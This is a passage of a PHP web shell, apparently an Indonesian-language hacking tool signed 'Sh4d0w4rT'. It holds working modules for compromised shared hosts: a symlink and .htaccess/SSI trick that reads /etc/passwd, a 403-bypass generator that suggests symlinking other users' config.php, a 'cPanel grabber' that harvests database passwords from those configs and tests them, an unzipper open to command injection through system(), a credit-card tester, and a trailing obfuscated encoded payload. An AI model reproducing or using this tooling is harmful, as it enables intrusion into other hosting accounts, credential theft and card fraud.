  1592.  
  1593. echo '<center><font style="color:#FFFFFF"><b>'.$url.'</b></font><font style="color:#0FFF16"> &#60;-- Not Vuln</font></center>';
  1594. }
  1595. ob_flush();flush();
  1596. }
  1597. }
  1598. }
  1599.  
  1600. // ********** x=cc ********** //
  1601. elseif(isset($_GET['x']) && ($_GET['x'] == 'cc')){
  1602. // creditcard valid tester
  1603. ?>
  1604. <form action="?rd=<?php echo $pwd; ?>&amp;x=cc" method="post">
  1605. <?php
  1606. class CreditCardValidator {
  1607. private $arrCardInfo = array('status' => null, 'type' => null, 'substring' => null, 'reason' => null);
  1608.  
  1609. private $arrCardTypes = array('amex' => array('name' => 'American Express','active' => true, 'iinrange' => '34,37','length' => 15), 'discover' => array('name' => 'Discover','active' => true,'iinrange' => '6011,622126-622925,644-649,65','length' => 16), 'mastercard' => array('name' => 'MasterCard','active' => true,'iinrange' => '51-55','length' => 16), 'visa' => array('name' => 'VISA','active' => true,'iinrange' => '4','length' => 16));
  1610.  
  1611. private $arrAcceptedMII = array(3, 4, 5, 6);
  1612. public function Validate($strCardNumber=null, $strCardType=null) {
  1613.  
  1614. if($strCardNumber === null) {
  1615. $this->arrCardInfo['failure'] = 'format';
  1616. $this->arrCardInfo['status'] = 'invalid';
  1617. return false;
  1618. }
  1619.  
  1620. if(($strCardType !== null) && !in_array($strCardType, $this->arrCardTypes)) {
  1621. $this->arrCardInfo['failure'] = 'cardtype';
  1622. $this->arrCardInfo['status'] = 'invalid';
  1623. return false;
  1624. }
  1625. if(!$this->CheckMII($strCardNumber)) {
  1626. $this->arrCardInfo['failure'] = 'mii';
  1627. $this->arrCardInfo['status'] = 'invalid';
  1628. return false;
  1629. }
  1630. if(!$this->CheckIIN($strCardNumber)) {
  1631. $this->arrCardInfo['failure'] = 'iin';
  1632. $this->arrCardInfo['status'] = 'invalid';
  1633. return false;
  1634. }
  1635. if(!$this->CheckLuhn($strCardNumber)) {
  1636. $this->arrCardInfo['failure'] = 'algorithm';
  1637. $this->arrCardInfo['status'] = 'invalid';
  1638. return false;
  1639. }
  1640. $this->arrCardInfo['status'] = 'valid';
  1641. $this->arrCardInfo['substring'] = $this->GetCardSubstring($strCardNumber);
  1642. return true;
  1643. }
  1644. private function CleanCardNumber($strCardNumber=null) {
  1645. return preg_replace('/[^0-9]/', '', $strCardNumber);
  1646. }
  1647.  
  1648. private function GetCardSubstring($strCardNumber=null) {
  1649. if(strstr($strCardNumber, '*') && (substr($strCardNumber) < 10)) return $strCardNumber;
  1650. $strCardNumber = $this->CleanCardNumber($strCardNumber);
  1651. return $strCardNumber ? '***'.substr($strCardNumber, (strlen($strCardNumber) - 4), 4) : '';
  1652. }
  1653.  
  1654. private function CheckMII($strCardNumber=null) {
  1655. $strCardNumber = $this->CleanCardNumber($strCardNumber);
  1656. if(!$strCardNumber) return false;
  1657.  
  1658. $intFirstDigit = (int) substr($strCardNumber, 0, 1);
  1659. if(!in_array($intFirstDigit, $this->arrAcceptedMII)) return false;
  1660. return true;
  1661. }
  1662.  
  1663. private function CheckLuhn($strCardNumber=null) {
  1664. $strCardNumber = (string) $this->CleanCardNumber($strCardNumber);
  1665. $strCheckDigit = substr($strCardNumber, (strlen($strCardNumber) - 1), 1);
  1666. $strCardNumberReverse = strrev($strCardNumber);
  1667. $intTotal = 0;
  1668. for($i = 1; $i <= strlen($strCardNumberReverse); $i++) {
  1669. $intVal = (int) ($i % 2) ? $strCardNumberReverse[$i-1] : ($strCardNumberReverse[$i-1] * 2);
  1670. if($intVal > 9) {
  1671. $strVal = (string) $intVal;
  1672. $intVal = (int) ($strVal[0] + $strVal[1]);
  1673. }
  1674. $intTotal += $intVal;
  1675. }
  1676. return (($intTotal % 10) == 0) ? true : false;
  1677. }
  1678.  
  1679. private function CheckIIN($strCardNumber=null) {
  1680. $strCardNumber = $this->CleanCardNumber($strCardNumber);
  1681. if(!$strCardNumber) return false;
  1682. $arrCardTypePossibilities = array();
  1683. foreach($this->arrCardTypes as $strShortName => $arrCardType) {
  1684. if($arrCardType['active'] === true) {
  1685. $strLen = strlen($strCardNumber);
  1686. if($strLen == $arrCardType['length']) {
  1687.  
  1688. $arrRangeSets = explode(',', $arrCardType['iinrange']);
  1689. foreach($arrRangeSets as $strRangeSetItem) {
  1690. $arrStrRanges = explode('-', $strRangeSetItem);
  1691. if(count($arrStrRanges) > 1) {
  1692. for($i = $arrStrRanges[0]; $i <= $arrStrRanges[1]; $i++) {
  1693.  
  1694. if((strpos((string) $strCardNumber, (string) $i) === 0) && !in_array($strShortName, $arrCardTypePossibilities)) $arrCardTypePossibilities[] = $strShortName;
  1695. }
  1696. } else {
  1697. if((strpos((string) $strCardNumber, (string) trim($arrStrRanges[0])) === 0) && !in_array($strShortName, $arrCardTypePossibilities)) $arrCardTypePossibilities[] = $strShortName;
  1698. }
  1699. }
  1700. }
  1701. }
  1702. }
  1703. $this->arrCardInfo['type'] = implode('|', $arrCardTypePossibilities);
  1704. return count($arrCardTypePossibilities) ? true : false;
  1705. }
  1706.  
  1707. public function GetCardInfo() {
  1708. return $this->arrCardInfo;
  1709. }
  1710.  
  1711. public function GetCardName($strCardShortName=null) {
  1712. return isset($this->arrCardTypes[$strCardShortName]['name']) ? $this->arrCardTypes[$strCardShortName]['name'] : '';
  1713. }
  1714. }
  1715. $CCV = new CreditCardValidator();
  1716.  
  1717. if(isset($_POST['cardnum'])) :
  1718. $CCV->Validate($_POST['cardnum']);
  1719. $CARDINFO = $CCV->GetCardInfo();
  1720. endif;
  1721. ?>
  1722.  
  1723. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
  1724. <html lang="en"><head>
  1725. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  1726. <title>Credit Card Validation - Test Page</title><style type="text/css">
  1727. body{ font-size: 13px; color: #333; font-family: 'georgia', 'times new roman', serif; margin: 20px; }
  1728.  
  1729. fieldset{ border: 0; margin: 0; font-style: italic; }
  1730.  
  1731. legend{ display: none; }
  1732.  
  1733. label{ width: 100%; float: left; clear: both; font-size: 15px; font-weight: bold; color: #999; line-height: 3; }
  1734.  
  1735. input, textarea{ font-size: 18px; line-height: 1.4; padding: 10px; border: 2px solid #eee; }
  1736.  
  1737. textarea{ background-color: #eee; color: blue; }
  1738.  
  1739. h2{ font-size: 30px; }
  1740.  
  1741. #fs-input input{ width: 500px; margin-bottom: 15px; }
  1742. #fs-input input.cb{ width: auto; }
  1743. #fs-submit input{ background-color: #333; color: lightyellow; }
  1744. </style>
  1745. </head>
  1746.  
  1747. <body><h2>Credit Card Tester</h2>
  1748. <form action="" method="post">
  1749. <fieldset id="fs-input"><legend></legend>
  1750. <label>Card Number</label>
  1751. <input type="text" style="color:#FF0000;background-color:#000000" name="cardnum" value="<?php echo @$_POST['cardnum']; ?>"><br>
  1752. <input type="checkbox" name="showgeek" class="cb" value="1"<?php if(isset($_POST['showgeek'])) echo ' checked'; ?>> Show Geeky Output
  1753. </fieldset>
  1754. <fieldset id="fs-submit">
  1755. <legend></legend>
  1756. <label></label>
  1757. <input type="submit" value="Check CC">
  1758. </fieldset>
  1759. <?php if(isset($_POST['cardnum'])) : ?>
  1760. <hr>
  1761.  
  1762. <h2>Result</h2><fieldset id="fs-result">
  1763. <legend></legend><label></label>
  1764. <strong>Status:</strong> <?php echo strtoupper($CARDINFO['status']); ?><br>
  1765. <strong>Card Type: </strong> <?php echo $CCV->GetCardName($CARDINFO['type']); ?>
  1766. </fieldset>
  1767. <?php endif; ?>
  1768. <?php if(isset($_POST['showgeek'])) : ?>
  1769. <fieldset id="fs-geek-result">
  1770. <legend></legend>
  1771. <label>Geeky Result</label>
  1772. <textarea style="color:#FF0000;background-color:#000000" rows="40" cols="80"><?php print_r($CCV); ?></textarea>
  1773. </fieldset>
  1774. <?php endif; ?>
  1775. </form></body></html>
  1776.  
  1777.  
  1778. <?php }
  1779. elseif(isset($_GET['x']) && ($_GET['x'] == 'lite')){ ?>
  1780. <form action="?y=<?php echo $pwd; ?>&amp;x=lite" method="post">
  1781. <head>
  1782. <title>LiteSpeed - Apache - Nginx </title>
  1783. </head>
  1784. <body><form method="POST">
  1785.  
  1786. <div align="left">
  1787. <table border="0" cellspacing="0" cellpadding="0" width="797">
  1788. <tr><td>
  1789. <font face="Verdana" color="#FF0000">
  1790. <p align="left"><font face="Tahoma"><font color="#FF0000">Full PATH</font> :
  1791. <font size="3">&nbsp;<b><input value="/etc/passwd" style="color:#FF0000;background-color:#000000" name="path" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000" size="44" tabindex="15">&nbsp;&nbsp;&nbsp;&nbsp;</b></font></font></p></font>
  1792.  
  1793. <font face="Tahoma" color="#FF0000">
  1794. <p align="left">File Name</font><font face="Verdana" color="#FF0000"><font face="Tahoma"> :
  1795. <font size="3">&nbsp;<b><input style="color:#FF0000;background-color:#000000" value="passwd.txt" name="filename" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000" size="44" tabindex="15">&nbsp;&nbsp;&nbsp;&nbsp;</b></font></font></p>
  1796.  
  1797. <p align="left"><font size="3" face="Tahoma"><b>&nbsp;&nbsp;&nbsp;</b></font><b><font size="3" face="Tahoma">
  1798. <input type="submit" style="color:#FF0000;background-color:#000000" value="Execute" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000" name="z00z"></font></b></p>
  1799. <b><font size="3" face="Tahoma"></form>
  1800.  
  1801. <?php
  1802.  
  1803. $path = $_POST['path'];
  1804. $file = $_POST['filename'];
  1805. if($_POST['z00z']){
  1806.  
  1807. echo'<br><br><font face="Verdana"><span style="background-color: #FFFFFF"><br></span></font>
  1808. <textarea rows="12" style="color:#FF0000;background-color:#000000" cols="96" name="Status b0x" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000">';
  1809.  
  1810. Error_reporting(0);
  1811. $direcotry = "litespeed";
  1812. $comp="T3B0aW9ucyArSW5jbHVkZXMNCkFkZFR5cGUgdGV4dC9odG1sIC5zaHRtbA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5zaHRtbA0K";
  1813. $mkdir = @mkdir($direcotry);
  1814. if($mkdir){
  1815. echo "[+] Creating Directory ... Done\n\n";
  1816. }else{
  1817. echo"[+] I Can't Make New Folder , But I'll Continue If It Exist's !\n\n";
  1818. }
  1819. @symlink("$path","litespeed/$file");
  1820.  
  1821. $open = fopen("litespeed/.htaccess","w");
  1822. $handle = fwrite($open,base64_decode($comp));
  1823. @fclose($open);
  1824. if($open){
  1825. echo"[+] Opening Apache Access File ... Done\n\n";
  1826. }else{
  1827. echo"[+] Access Denied \n\n";
  1828. exit;
  1829. }
  1830.  
  1831. if($handle){
  1832. echo"[+] Writing Access RuleZ ... Done \n\n";
  1833. }
  1834.  
  1835. $r="PCEtLSNpbmNsdWRlIHZpcnR1YWw9Ig==";
  1836. $r1 = "IiAtLT4=";
  1837. $open2 = fopen("litespeed/litespeed.shtml","w");
  1838. $handle2 = fwrite($open2,base64_decode($r).$file.base64_decode($r1));
  1839. @fclose($open2);
  1840. if($open2){
  1841. echo"[+] Opening Server HTML Web Page ... Done\n\n";
  1842. }else{
  1843. echo"[+] Access Denied \n\n";
  1844. exit;
  1845. }
  1846.  
  1847. if($handle2){
  1848. echo"[+] Writing SHTML RuleZ ... Done \n\n";
  1849. echo"[+] All Task'z Have Done !";
  1850. }
  1851. echo'</textarea></td></tr></table></div><p>&nbsp;</p>';
  1852. }
  1853. ?>
  1854.  
  1855.  
  1856. <?php }
  1857. // x=unzip
  1858. elseif(isset($_GET['x']) && ($_GET['x'] == 'unzip')){
  1859. // unzipper file in aktiv pwd
  1860. ?>
  1861. <form action="?rd=<?php echo $pwd; ?>&amp;x=unzip" method="post">
  1862. <center><br/><br/><nobr><span class="b7"> ZIP FILE</span> <span class="b8">EXTRACTOR </nobr><br/><br/>
  1863. <?php
  1864. $file = $_POST['file'];
  1865. if (isset($file)){
  1866. echo "<nobr><b>=> PROSES BONGKAR <=</b><br><br></nobr>";
  1867. system('unzip -o ' . $file);
  1868. echo "<br/>";
  1869. exit;
  1870. }
  1871.  
  1872. $handler = opendir(".");
  1873. echo "<center><b>Pilih File Yg Mau Di Unzip :<b><br> " . "<br>";
  1874. echo '<form action="" method="get">';
  1875. $found = false;
  1876. while ($file = readdir($handler)) {
  1877. if (preg_match ("/.zip$/i", $file)) {
  1878. echo '<input type="checkbox" name="file" value=' . $file . '> ' . $file . '<br>';
  1879. $found = true;
  1880. }
  1881. }
  1882. closedir($handler);
  1883. if ($found == false)
  1884. echo "<br><br><b>=> GA ADA FILE EXTENSI ZIP <=<b><br>";
  1885. else
  1886. echo '<br><br><input type="submit" value="Unzip File">';
  1887. echo "</form>";
  1888. ?>
  1889.  
  1890. <?php }
  1891. // x=analyzer
  1892. elseif(isset($_GET['x']) && ($_GET['x'] == 'analyzer')){
  1893. // analyze type of hash
  1894. ?>
  1895. <form action="?rd=<?php echo $pwd; ?>&amp;x=analyzer" method="post">
  1896.  
  1897. <center><br/><br/><nobr><span class="b7"> HASH TYPE</span> <span class="b8">ANALYZER </nobr><br/><br/> <form method=POST>
  1898. <input type="text" style="color:#FF0000;background-color:#000000" name="hashToAnalyze" size=60><input type="submit" style="color:#FF0000;background-color:#000000" value="Check Hash Now" name="analyzieNow"></form></center>
  1899. <?php
  1900. if($_POST['analyzieNow']){
  1901. $hash = $_POST['hashToAnalyze'];
  1902. $subHash = substr($hash,0,3);
  1903. if($subHash =='$ap' && strlen($hash) == 37){
  1904. echo "The Hash : ".$hash." is : MD5(APR) Hash";
  1905. }
  1906. else if($subHash =='$1$' && strlen($hash) == 34){
  1907. echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
  1908. }
  1909. else if($subHash =='$H$' && strlen($hash) == 35){
  1910. echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
  1911. }
  1912. else if(strlen($hash) == 29){
  1913. echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
  1914. }
  1915. else if($subHash =='$5$' && strlen($hash) == 64){
  1916. echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
  1917. }
  1918. else if($subHash =='$6$' && strlen($hash) == 128){
  1919. echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
  1920. }
  1921. else if(strlen($hash) == 56){
  1922. echo "The Hash : ".$hash." is : SHA224 Hash";
  1923. }
  1924. else if(strlen($hash) == 64){
  1925. echo "The Hash : ".$hash." is : SHA256 Hash";
  1926. }
  1927. else if(strlen($hash) == 96){
  1928. echo "The Hash : ".$hash." is : SHA384 Hash";
  1929. }
  1930. else if(strlen($hash) == 128){
  1931. echo "The Hash : ".$hash." is : SHA512 Hash";
  1932. }
  1933. else if(strlen($hash) == 40){
  1934. echo "The Hash : ".$hash." is : MySQL v5.x Hash";
  1935. }
  1936. else if(strlen($hash) == 16){
  1937. echo "The Hash : ".$hash." is : MySQL Hash";
  1938. }
  1939. else if(strlen($hash) == 13){
  1940. echo "The Hash : ".$hash." is : DES(Unix) Hash";
  1941. }
  1942. else if(strlen($hash) == 32){
  1943. echo "The Hash : ".$hash." is : MD5 Hash";
  1944. }
  1945. else if(strlen($hash) == 4){
  1946. echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
  1947. else {
  1948. echo "Error : Can't Detect Hash Type";
  1949. }
  1950. }
  1951. ?>
  1952.  
  1953.  
  1954. <?php }
  1955. // ********** x=403 ********** //
  1956. elseif(isset($_GET['x']) && ($_GET['x'] == '403')){
  1957. // working on forbidden directory
  1958. ?>
  1959. <form action="?rd=<?php echo $pwd; ?>&amp;x=403" method="post">
  1960.  
  1961. <?php
  1962. if($_POST['generateForbidden']){
  1963. @chdir($_POST['forbiddenPath']);
  1964. @mkdir('403');
  1965. @chdir('403');
  1966. $htaccess = fopen('.htaccess','w+');
  1967. if($_POST['403'] == 'DirectoryIndex'){
  1968. fwrite($htaccess,"DirectoryIndex in.txt");
  1969. }
  1970. elseif($_POST['403'] == 'HeaderName'){
  1971. fwrite($htaccess,"HeaderName in.txt");
  1972. }
  1973. elseif($_POST['403'] == 'TXT'){
  1974. fwrite($htaccess,"
  1975. Options Indexes FollowSymLinks
  1976. addType txt .php
  1977. AddHandler txt .php");
  1978. }
  1979. elseif($_POST['403'] == '404'){
  1980. fwrite($htaccess,"ErrorDocument 404 /404.html 404.html = Symlinked in.txt ");
  1981. }
  1982. elseif($_POST['403'] == 'ReadmeName'){
  1983. fwrite($htaccess,"ReadmeName in.txt");
  1984. }
  1985. elseif($_POST['403'] == 'footerName'){
  1986. fwrite($htaccess,"footerName in.txt");
  1987. }
  1988. echo "<nobr>Now Go To [ forbidden ] Dir And Then make Symlink Methode [ in.txt ]<br/>
  1989. EX command : ln -s /home/user/public_html/config.php hack.txt</nobr>";
  1990. }
  1991. echo "<br><br><center><form method=POST><input type='text' style='color:#FF0000;background-color:#000000' value='".getcwd()."' name='forbiddenPath' size='30%'/><select style='color:#FF0000;background-color:#000000' name='403'><option value='DirectoryIndex'>DirectoryIndex</option><option value='HeaderName'>HeaderName</option><option value='TXT'>TXT</option><option value='404'>404</option><option value='ReadmeName'>ReadmeName</option><option value='footerName'>footerName</option> </select>
  1992. <input type='submit' style='color:#FF0000;background-color:#000000' value='Generate' name='generateForbidden'></form></center>";
  1993. ?>
  1994.  
  1995. <?php }
  1996. // ********** x=cp3 ********** //
  1997. elseif(isset($_GET['x']) && ($_GET['x'] == 'cp3')){
  1998. // cpanel user login
  1999. ?>
  2000. <form action="?rd=<?php echo $pwd; ?>&amp;x=cp3" method="post">
  2001.  
  2002. <?php
  2003. set_time_limit(0);
  2004. error_reporting(0);
  2005. if(isset($_POST['url'])){
  2006. $url = $_POST['url'];
  2007. }else{
  2008. $url = 'http://';
  2009. }
  2010. echo '<center><br/><br/><nobr><span class="b7"> CPANEL</span> <span class="b8">GRABBER </nobr><br/><br/>
  2011. <form method="POST">
  2012. <input name="url" style="color:#FF0000;background-color:#000000" type="text" value="'.$url.'" size="40"/><br/>
  2013. <p><input type="submit" style="color:#FF0000;background-color:#000000" value="--:[ HAJAR ]:--"/>
  2014. </form><br/><br/>';
  2015. if(isset($_POST['url'])){
  2016. if(!file_get_contents($url)){
  2017. echo '--:[ ERROR SAINT ]:--';
  2018. }else{
  2019. $a = 0;
  2020. foreach(get_data($url) as $info){
  2021. if(login($info[0],$info[1])){
  2022. echo "<b style=' color: #808080 ; text-shadow:0px 0px 1px #808080 ;'> USERNAME & PASSWORD </b> <b style=' color: #0000FF ; text-shadow:0px 0px 1px #0000FF ;'>[$info[0]]</b> <b style=' color: #CC0000; text-shadow:0px 0px 1px #CC0000;'>[$info[1]]</b><br />";
  2023. $a++;
  2024. }
  2025. }
  2026. echo "<b style=' color: #808080 ; text-shadow:0px 0px 1px #808080 ;'><hr> *SUKSES | $a CPANEL FOUNDED*<br />";
  2027. }
  2028. }
  2029. echo '<br/><div align="center"><font color="blue" face="Verdana" size="3">--=|[+] Sh4d0w4rT [+]|=--</font></div>
  2030. </body>
  2031. </html>';
  2032. function ex($a,$b,$text){
  2033. $explode = explode($a,$text);
  2034. $explode = explode($b,$explode[1]);
  2035. return $explode[0];
  2036. }
  2037. function login($user,$pass){
  2038. $c = @mysql_connect('localhost',$user,$pass);
  2039. if($c){
  2040. mysql_close($c);
  2041. return true;
  2042. }else{
  2043. return false;
  2044. }
  2045. }
  2046. function get_data($url){
  2047. $ar = array('1.txt','2.txt','3.txt','4.txt','5.txt','6.txt','7.txt','8.txt','9.txt','10.txt','11.txt','12.txt','13.txt','14txt','15.txt','16.txt','17.txt','18.txt','19.txt','20.txt','21.txt','22.txt','23.txt','24.txt','25.txt','26.txt','27.txt','28.txt','29.txt','30.txt','31.txt','32.txt','33.txt','34.txt','35.txt','36.txt','37.txt','38.txt','39.txt','40.txt','41.txt','42.txt','43.txt','44.txt','45.txt','46.txt','47.txt','48.txt','49.txt','50.txt');
  2048. $src = file_get_contents($url);
  2049. $files = explode('<a href="',$src);
  2050. $data = array();
  2051. foreach($files as $id=>$file){
  2052. if($id == 0){
  2053. continue;
  2054. }
  2055. $file = explode('">',$file);
  2056. $file = trim($file[0]);
  2057. if(!eregi('.txt',$file)){
  2058. continue;
  2059. }
  2060. $src = file_get_contents("$url/$file");
  2061. if(!$src){
  2062. continue;
  2063. }
  2064. $user = str_replace($ar,'',$file);
  2065. $user = str_replace($ar,'',$user.'.txt');
  2066. $user = str_replace($ar,'',$user.'.txt');
  2067. $user = trim(str_replace('.txt','',$user));
  2068. if(eregi("WordPress",$src)){
  2069. $pass = ex("define('DB_PASSWORD', '","');",$src);
  2070. $data[] = array($user,$pass);
  2071. }else{
  2072. $tokens = token_get_all($src);
  2073. foreach($tokens as $token){
  2074. if(!$token[1]){
  2075. continue;
  2076. }
  2077. $tokenname = token_name($token[0]);
  2078. if($tokenname != 'T_VARIABLE'){
  2079. continue;
  2080. }
  2081. $var = $token[1];
  2082. if(eregi('pass',$var)){
  2083. $f = str_replace(' ','',ex($var,';',$src));
  2084. $a = trim(ex("='","'",$f));
  2085. $b = trim(ex('"','"',$f));
  2086. if($a != ''){
  2087. $pass = $a;
  2088. }elseif($b != ''){
  2089. $pass = $b;
  2090. }
  2091. if($pass == ''){
  2092. continue;
  2093. }
  2094. $data[] = array($user,$pass);
  2095. }
  2096. }
  2097. }
  2098. }
  2099. return $data;
  2100. }
  2101. ;
  2102. return;
  2103. ?>~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